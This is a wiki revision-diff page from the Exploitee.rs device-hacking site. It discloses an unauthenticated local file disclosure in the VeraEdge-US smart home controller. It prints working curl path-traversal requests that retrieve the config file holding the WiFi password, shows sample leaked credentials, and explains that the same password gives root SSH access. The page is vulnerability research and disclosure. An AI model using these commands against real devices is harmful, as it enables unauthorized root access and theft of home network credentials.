Difference between revisions of "VeraEdge Smart Home"

From Exploitee.rs
Jump to navigationJump to search
(Created page with "__FORCETOC__ {{Disclaimer}} 120px|left|thumb Category:Home Automation =VeraEdge-US Smart Home Controller= The VeraEdge-US is a smart home controller...")
 
 
(2 intermediate revisions by one other user not shown)
Line 18: Line 18:
Unfortunately get_file requires a directory to exist which store_file conveniently creates. A POC for retrieving the file containing the devices SSID and WiFi key (/etc/cmh/cmh.conf) can be seen below.
Unfortunately get_file requires a directory to exist which store_file conveniently creates. A POC for retrieving the file containing the devices SSID and WiFi key (/etc/cmh/cmh.conf) can be seen below.
<pre>
<pre>
curl -X POST -v 'http://192.168.1.130/cgi-bin/cmh/store_file.sh' --data store_file=123
curl -X POST -v 'http://<DEVICEIP>/cgi-bin/cmh/store_file.sh' --data store_file=123
curl -X POST -v 'http://192.168.1.130/cgi-bin/cmh/get_file.sh' --data filename="../../../../../etc/cmh/cmh.conf"
curl -X POST -v 'http://<DEVICEIP>/cgi-bin/cmh/get_file.sh' --data filename="../../../../../etc/cmh/cmh.conf"


ArchiveLogsOnServer=1
ArchiveLogsOnServer=1
Line 26: Line 26:
HW_Key=3sMwesqBERodWW7l3mew43fsC1d3sf
HW_Key=3sMwesqBERodWW7l3mew43fsC1d3sf
</pre>
</pre>
== Root SSH Access ==
Utilizing the Local File Disclosure mentioned above, one can obtain the device specific WiFi information (SSID and Password) for the device. Conveniently the WiFi Password is the same as the password for the "root" user account.
SSHing to the device, with a login of root, and the device specific password, one can obtain root privileges remotely on the device.
=== Demo ===
{{#ev:youtube|Q02ZYHT5Efo}}

Latest revision as of 00:42, 11 August 2017

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

VERAEDGE.JPG

VeraEdge-US Smart Home Controller

The VeraEdge-US is a smart home controller used for bridging smart home devices with a users WiFi network.

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the VeraEdge-US Smart Home Controller at Amazon

Local File Disclosure

VeraEdge-US Smart Home contains a Local File Disclosure via get_file.sh and store_file.sh, both which can be hit without authentication. Below you can find the code within get_file.sh.

VERAEDGE LFD ROOT.JPG

Unfortunately get_file requires a directory to exist which store_file conveniently creates. A POC for retrieving the file containing the devices SSID and WiFi key (/etc/cmh/cmh.conf) can be seen below.

curl -X POST -v 'http://<DEVICEIP>/cgi-bin/cmh/store_file.sh' --data store_file=123
curl -X POST -v 'http://<DEVICEIP>/cgi-bin/cmh/get_file.sh' --data filename="../../../../../etc/cmh/cmh.conf"

ArchiveLogsOnServer=1
ESSID=mios_45026848
Password=wind72sand
HW_Key=3sMwesqBERodWW7l3mew43fsC1d3sf

Root SSH Access

Utilizing the Local File Disclosure mentioned above, one can obtain the device specific WiFi information (SSID and Password) for the device. Conveniently the WiFi Password is the same as the password for the "root" user account.

SSHing to the device, with a login of root, and the device specific password, one can obtain root privileges remotely on the device.

Demo